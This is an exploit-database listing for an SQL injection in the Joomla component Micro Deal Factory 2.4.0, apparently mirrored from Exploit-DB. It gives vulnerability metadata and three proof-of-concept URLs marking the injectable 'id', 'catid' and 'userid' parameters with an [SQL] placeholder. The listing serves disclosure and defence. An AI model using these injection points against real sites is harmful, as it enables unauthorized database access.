header-logo
Suggest Exploit
vendor:
Micro Deal Factory
by:
Ihsan Sencan
7.5
CVSS
HIGH
SQL Injection
CWE
Product Name: Micro Deal Factory
Affected Version From: 2.4.2000
Affected Version To: 2.4.2000
Patch Exists: NO
Related CWE:
CPE: a:thephpfactory:micro_deal_factory:2.4.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 (x64), Kali Linux (x64)
2018

Joomla! Component Micro Deal Factory 2.4.0 – ‘id’ SQL Injection

The Joomla! Component Micro Deal Factory version 2.4.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting SQL code into the 'id' parameter of various URLs, potentially gaining unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the Micro Deal Factory component.
Source

Exploit-DB raw data:

# Exploit Title: Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/micro-deal-factory/
# Version: 2.4.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
http://localhost/[PATH]/index.php?option=com_microdealfactory&task=dealdetail&id=[SQL]
http://localhost/[PATH]/my-deals/mydeals/catid,15[SQL]/other
http://localhost/[PATH]/component/microdealfactory/listdeals/userid,44[SQL]/user01

Navigation

Suggest Exploit

Services By CQR